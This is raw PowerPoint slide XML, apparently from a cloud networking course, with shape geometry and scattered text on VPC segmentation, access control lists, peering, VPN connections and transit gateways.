            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1843277" y="2992373"/>
              <a:ext cx="4729480" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4729480" h="469900">
                  <a:moveTo>
                    <a:pt x="4650740" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4722820" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706048" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681180" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650740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843277" y="2992373"/>
              <a:ext cx="4729480" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4729480" h="469900">
                  <a:moveTo>
                    <a:pt x="78232" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4650740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681180" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706048" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4722820" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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831085" y="3461765"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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831085" y="3461765"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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026666" y="3814064"/>
            <a:ext cx="1054417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use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traditional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access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control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lists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vendor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security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appliance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instances.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26666" y="3027679"/>
            <a:ext cx="334073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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Routin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>bet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ween</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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65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bnets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821560" y="5348096"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1821560" y="5348096"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1843277" y="5357621"/>
              <a:ext cx="4730750" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4730750" h="469900">
                  <a:moveTo>
                    <a:pt x="4652264" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4730496" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4730496" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4724344" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4707572" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4682704" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4652264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843277" y="5357621"/>
              <a:ext cx="4730750" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4730750" h="469900">
                  <a:moveTo>
                    <a:pt x="78232" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4652264" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4682704" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4707572" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4724344" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4730496" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4730496" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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831085" y="5827013"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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831085" y="5827013"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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2026666" y="5393563"/>
            <a:ext cx="11645265" cy="1320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4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2200" spc="15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70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ltip</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VPC</a:t>
            </a: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segment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ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2255"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="9263380" algn="l"/>
              </a:tabLst>
            </a:pP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Con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ec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ivity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bet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ween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VPC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sam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accoun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twe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VPC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	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differ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nt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accounts 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bet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ween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VPC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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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premises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netwo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ks.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95876" y="1780793"/>
            <a:ext cx="769747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VPCs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transit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gateways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function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based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following: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17540" y="306451"/>
            <a:ext cx="481901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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPCs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gateways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8908" y="760476"/>
            <a:ext cx="6480047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821560" y="2988945"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1821560" y="2988945"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1843277" y="2998470"/>
              <a:ext cx="4729480" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4729480" h="469900">
                  <a:moveTo>
                    <a:pt x="4650740" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4722820" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706048" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681180" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650740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843277" y="2998470"/>
              <a:ext cx="4729480" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4729480" h="469900">
                  <a:moveTo>
                    <a:pt x="78232" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4650740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681180" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706048" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4722820" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0CA7B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831085" y="3467862"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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831085" y="3467862"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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026666" y="3034029"/>
            <a:ext cx="11697970" cy="13042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Peering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relationships</a:t>
            </a:r>
            <a:endParaRPr sz="2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135"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="10367010" algn="l"/>
              </a:tabLst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ref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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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one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ections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,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w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mean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con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ectivit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between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VP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	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us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ng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VPN</a:t>
            </a:r>
            <a:endParaRPr sz="2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gateways.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821560" y="5354192"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1821560" y="5354192"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1843277" y="5363717"/>
              <a:ext cx="4729480" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4729480" h="469900">
                  <a:moveTo>
                    <a:pt x="4650740" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4722820" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706048" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681180" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650740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843277" y="5363717"/>
              <a:ext cx="4729480" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4729480" h="469900">
                  <a:moveTo>
                    <a:pt x="78232" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4650740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681180" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4706048" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4722820" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4728972" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78232" y="0"/>
